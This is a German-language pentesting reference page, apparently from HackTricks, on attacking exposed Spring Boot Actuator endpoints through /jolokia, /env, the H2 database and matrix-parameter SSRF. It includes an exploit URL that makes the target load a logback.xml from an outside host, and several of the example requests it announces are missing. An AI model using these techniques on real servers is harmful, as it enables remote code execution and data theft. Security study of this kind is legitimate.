Spring Actuators
Last updated
Last updated
Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Von https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Überprüfe den Originalbeitrag von [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Spring Boot Actuators registrieren Endpunkte wie /health
, /trace
, /beans
, /env
usw. In den Versionen 1 bis 1.4 sind diese Endpunkte ohne Authentifizierung zugänglich. Ab Version 1.5 sind nur /health
und /info
standardmäßig nicht sensibel, aber Entwickler deaktivieren oft diese Sicherheit.
Bestimmte Actuator-Endpunkte können sensible Daten offenlegen oder schädliche Aktionen ermöglichen:
/dump
, /trace
, /logfile
, /shutdown
, /mappings
, /env
, /actuator/env
, /restart
und /heapdump
.
In Spring Boot 1.x sind Actuators unter der Root-URL registriert, während sie in 2.x unter dem Basis-Pfad /actuator/
liegen.
Remote Code Execution über '/jolokia':
Der /jolokia
Actuator-Endpunkt exponiert die Jolokia-Bibliothek, die HTTP-Zugriff auf MBeans ermöglicht.
Die Aktion reloadByURL
kann ausgenutzt werden, um Logging-Konfigurationen von einer externen URL neu zu laden, was zu blindem XXE oder Remote Code Execution über gestaltete XML-Konfigurationen führen kann.
Beispiel für eine Exploit-URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
Konfigurationsänderung über '/env':
Wenn Spring Cloud-Bibliotheken vorhanden sind, ermöglicht der /env
Endpunkt die Änderung von Umgebungsvariablen.
Eigenschaften können manipuliert werden, um Schwachstellen auszunutzen, wie die XStream-Deserialisierungsanfälligkeit im Eureka serviceURL.
Beispiel für eine Exploit-POST-Anfrage:
Weitere nützliche Einstellungen:
Eigenschaften wie spring.datasource.tomcat.validationQuery
, spring.datasource.tomcat.url
und spring.datasource.tomcat.max-active
können für verschiedene Exploits manipuliert werden, wie SQL-Injection oder das Ändern von Datenbankverbindungszeichenfolgen.
Eine umfassende Liste der Standard-Actuators findest du hier.
Der /env
Endpunkt in Spring Boot 2.x verwendet das JSON-Format zur Modifikation von Eigenschaften, aber das allgemeine Konzept bleibt dasselbe.
Env + H2 RCE:
Details zur Ausnutzung der Kombination von /env
Endpunkt und H2-Datenbank findest du hier.
SSRF auf Spring Boot durch falsche Pfadinterpretation:
Die Handhabung von Matrixparametern (;
) in HTTP-Pfaden durch das Spring-Framework kann für Server-Side Request Forgery (SSRF) ausgenutzt werden.
Beispiel für eine Exploit-Anfrage:
Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)